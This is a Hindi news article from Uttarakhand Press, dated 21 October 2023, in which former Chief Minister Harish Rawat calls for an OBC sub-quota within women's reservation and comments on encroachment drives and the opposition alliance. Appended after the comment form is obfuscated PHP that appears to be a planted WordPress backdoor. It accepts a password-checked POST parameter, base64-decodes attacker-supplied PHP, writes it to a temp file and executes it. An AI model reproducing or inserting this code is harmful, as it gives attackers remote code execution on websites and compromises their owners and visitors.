Uttarakhand: रामनगर पहुंचे उत्तराखंड के पूर्व CM हरीश रावत , OBC महिलाओं के आरक्षण के लिए सब कोटा बनाने की मांग की

Uttarakhand Press 21 October 2023: रामनगर। पूर्व सीएम हरीश रावत ने कहा कि महिला आरक्षण की बुनियाद कांग्रेस ने यूपीए के समय में रखी थी। 2011 में राज्यसभा में इसे पारित किया था। महिला आरक्षण बिल को जनगणना व परिसीमन के साथ जोड़ने से इसमें देरी होगी। अगले साल लोकसभा चुनाव में इसे प्रभावी किया जाए।

संविधान में संशोधन भी करना पड़े तो हम तैयार:
सरकार को चाहिए कि महिला आरक्षण के पारित एक्ट में ओबीसी की महिलाओं का सब कोटा बनाया जाए। साथ ही इसे लागू करने का अधिकार चुनाव आयोग को देने का भी संशोधन किया जाए। कहा, यदि संविधान में संशोधन भी करना पड़े तो हम तैयार हैं।

राज्य सरकार की ओर से तोड़े गए अतिक्रमण को लेकर पूर्व सीएम रावत ने कहा कि पहले के वैध जगह को सरकार मापदंड बदलने की वजह से अब अवैध मान रही है। बागेश्वर उपचुनाव में अपनी स्थिति देख निकाय चुनाव को सरकार जानबूझकर टाल रही है।

अखिलेश यादव की कांग्रेस से नाराजगी के सवाल पर रावत ने कहा कि गठबंधन विधानसभा चुनाव के लिए नहीं, लोकसभा के लिए हुआ है। इसके बाद पूर्व सीएम ने पैठपड़ाव, कानिया व पीरूमदारा में आयोजित रामलीला में शामिल हुए। इस दौरान पूर्व दर्जा राज्य मंत्री पुष्कर दुर्गापाल भी मौजूद रहे।

Read Previous

उत्तर प्रदेश में दर्दनाक हादसा: यमुना एक्सप्रेसवे पर अज्ञात वाहन ने कार को मारी टक्कर, पांच की मौत और तीन गंभीर

Read Next

उत्तराखंड में अगले महीने राष्ट्रपति और प्रधानमंत्री का दौरा, दिवाली के आसपास केदारनाथ आ सकते हैं पीएम मोदी

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}